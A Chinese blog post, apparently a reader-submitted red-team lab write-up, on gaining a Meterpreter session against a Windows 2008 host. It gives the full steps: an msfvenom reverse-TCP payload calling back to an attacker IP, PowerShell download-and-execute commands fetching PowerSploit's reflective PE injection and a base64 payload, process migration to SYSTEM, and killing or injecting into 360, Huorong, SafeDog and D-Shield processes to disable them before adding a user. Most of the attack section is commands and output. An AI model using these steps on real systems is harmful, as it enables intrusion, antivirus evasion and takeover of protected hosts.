记一次PowerShell配合Metersploit的艰难提权

简介: 记一次PowerShell配合Metersploit的艰难提权

感谢群友@Erikten投稿 。这篇文章中还是存在有一些亮点,仔细看,相信你能发现!


0x01 环境准备

kali(模拟公网攻击机)

Windows2008(靶机,装有360、火绒、安全狗、D盾)

Powersploit(PowerShell攻击框架)

https://github.com/PowerShellMafia/PowerSploit


0x02 尝试落地payload

首先msfvenom生成exe后门程序

    msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe lhost=192.168.192.119 lport=6666 -o ./6666.exe


    Python3开启http下载服务

      python3 -m http.server


      msf开启监听

      执行powershell命令时被火绒拦截

        (New-Object Net.WebClient).DownloadString("http://192.168.192.119:8000/6666.exe")

        0x03 PowerShell内存执行exe

        这也是现在红军非常流行的攻击手法,payload在内存中加载执行,也就是所谓的文件不落地,大致分以下几步

        • 先将生成的payload在本地进行base64编码
        • 靶机执行远程下载命令
        • 靶机对payload进行解码并赋值给一个变量
        • PowerShell远程加载Invoke-ReflectivePEInjection模块(PE反射注入)并执行payload


        本地编码payload

        PowerShell下执行

          function Convert-BinaryToString {
            [CmdletBinding()] param (
              [string] $FilePath
              )
              try {
                $ByteArray = [System.IO.File]::ReadAllBytes($FilePath); 
                }
                catch {
                  throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
                  } 
                  if ($ByteArray) {
                    $Base64String = [System.Convert]::ToBase64String($ByteArray);
                  }
                  else {
                    throw '$ByteArray is $null.'; 
                    } 
                  Write-Output -InputObject $Base64String;
                }
          Convert-BinaryToString C:\6666.exe > C:\res.txt


          将res.txt放置到kali中的下载服务目录,供靶机加载

          接下来远程加载Powersploit的PE反射模块

            iex(New-Object Net.WebClient).DownloadString("http://192.168.192.119:8000/Invoke-ReflectivePEInjection.ps1")


            继续加载base64编码后的payload,赋值给一个变量

              $b64Str = (New-Object Net.WebClient).DownloadString("http://192.168.192.119:8000/res.txt")


              靶机解码payload

                $PEBytes = [System.Convert]::FromBase64String($InputString)


                反射调用

                  Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR

                  msf成功上线,全程没有任何文件落地,比较成功地避开了杀软对磁盘的查杀

                  0x04 艰难的后渗透攻击

                  先看一下进程,Windows下,我个人比较中意svchost.exe这个进程,注入率比较高,而且又是system权限,先来试试吧

                    ps -ef | grep svchost.exe

                    成功提权

                      migrate 336

                      当我准备添加用户的时候,被360的ZhuDongFangYu.exe进程拦截,接下来就是想办法干掉360、火绒、D盾、安全狗的主动防御系统

                      0x05 Kill主动防御

                      因为现在是system权限,所以优先尝试kill、pkill这两条命令。经过fuzz,得出以下几点结论

                      • D盾可直接Kill掉
                      • 360、安全狗Kill掉后,30秒后会再次重启
                      • 火绒权限不够,无法直接Kil
                      meterpreter > pkill ZhuDongFangYu.exe 
                      Filtering on 'ZhuDongFangYu.exe' 
                      Killing: 6056 
                      meterpreter > pkill SafeDogGuardCenter.exe 
                      Filtering on 'SafeDogGuardCenter.exe' 
                      Killing: 5752 
                      meterpreter > pkill HipsTray.exe 
                      Filtering on 'HipsTray.exe' 
                      Killing: 7416 
                      [-] stdapi_sys_process_kill: Operation failed: Access is denied. 
                      meterpreter >
                      

                      0x06 单换杀软的男人

                      因为360的权限是比较高的,且我现在是system权限,就像尝试注入一下360的主动防御进程,竟然成功了!

                      这一下我直接好家伙,先把SafeDog干掉

                        ps -ef | Safe
                        pkill Safe

                        来靶机上看一下,发现安全狗的主进程都被干掉了,360还是狠啊

                        当我尝试杀死火绒的进程时,被火绒反杀了,也就是说,火绒把360的主动防御干掉了,可想而知它的权限得多大

                        重连一次shell后,我尝试注入360主动防御,杀死所有360的程序,成功拿下!

                        这时候还有一个ZhuDongFangYu.exe没杀,所以我们再注入回svchost.exe用它去杀死360的主动防御,这次杀死后就不会再生了,因为主程序已经被它干死了哈哈哈

                        现在就剩下火绒了,我进入shell,尝试用taskkill干掉他的时候,发现了一个有意思的提示

                        火绒的父进程是service.exe,那么如果我注入到service.exe中,用service.exe杀Hips*.exe不过分吧?老子打儿子总没毛病了吧?

                        结果让我很满意哈哈哈哈哈

                        成功添加用户,遗憾的是没有添加到管理员组,这次艰难的后渗透,就先到这儿吧

                        相关文章
                        |
                        安全 API 数据安全/隐私保护
                        Cobaltstrike4.0——记一次上头的powershell上线分析(三)
                        Cobaltstrike4.0——记一次上头的powershell上线分析
                        274 0
                        |
                        网络协议 网络安全
                        Powershell免杀(无文件落地免杀)
                        无文件落地 顾名思义,无需将恶意文件传到目标服务器/机器上,直接利用powershell的特性加载到内存执行。为了在红队行动中更隐蔽的实施攻击以及横向移动,同时还可以解决目标不出网只能通过dns上线时的棘手问题,利用powershell可以避免一行行echo。 通过两种方式进行无文件落地的免杀,一种是出网的情况,另一种为不出网情况。 声明: 文章内容仅供网络安全爱好者学习使用,请勿用文章中提到的技术或工具做违法的事情,否则后果自负。
                        1083 0
                        |
                        27天前
                        |
                        安全 网络安全 API
                        基于WMI更新Windows系统信息采集程序sysInfo的一些收获
                        基于WMI更新Windows系统信息采集程序sysInfo的一些收获
                        |
                        2月前
                        |
                        监控 关系型数据库 MySQL
                        优秀的网络工程师,早就偷偷收藏了这9 个实用 Shell 脚本!
                        优秀的网络工程师,早就偷偷收藏了这9 个实用 Shell 脚本!
                        |
                        5月前
                        |
                        监控 Shell 持续交付
                        利用Shell脚本自动化员工电脑监管软件的部署流程
                        在企业管理中,对员工的电脑活动进行监管是一项重要任务。而为了实现这一目标,部署监管软件是必不可少的。本文将介绍如何利用Shell脚本来自动化部署员工电脑监管软件的流程。我们将演示如何使用Shell脚本来自动下载、安装和配置监管软件,并且在部署完成后自动启动服务。
                        213 4
                        CS-Powershell免杀-过卡巴等杀软上线
                        CS-Powershell免杀-过卡巴等杀软上线
                        502 0
                        |
                        Shell Linux 网络安全
                        [笔记]Linux Shell脚本实现自动输入 解放双手 自动测试
                        [笔记]Linux Shell脚本实现自动输入 解放双手 自动测试
                        106 0
                        |
                        安全 Shell API
                        powershell红队免杀上线小Tips
                        powershell红队免杀上线小Tips
                        powershell红队免杀上线小Tips
                        |
                        安全 数据安全/隐私保护 Windows
                        Powershell 免杀过 defender 火绒,附自动化工具
                        Powershell 免杀过 defender 火绒,附自动化工具
                        1147 0
                        红队|执行Mimikatz的64种方式
                        红队|执行Mimikatz的64种方式
                        299 0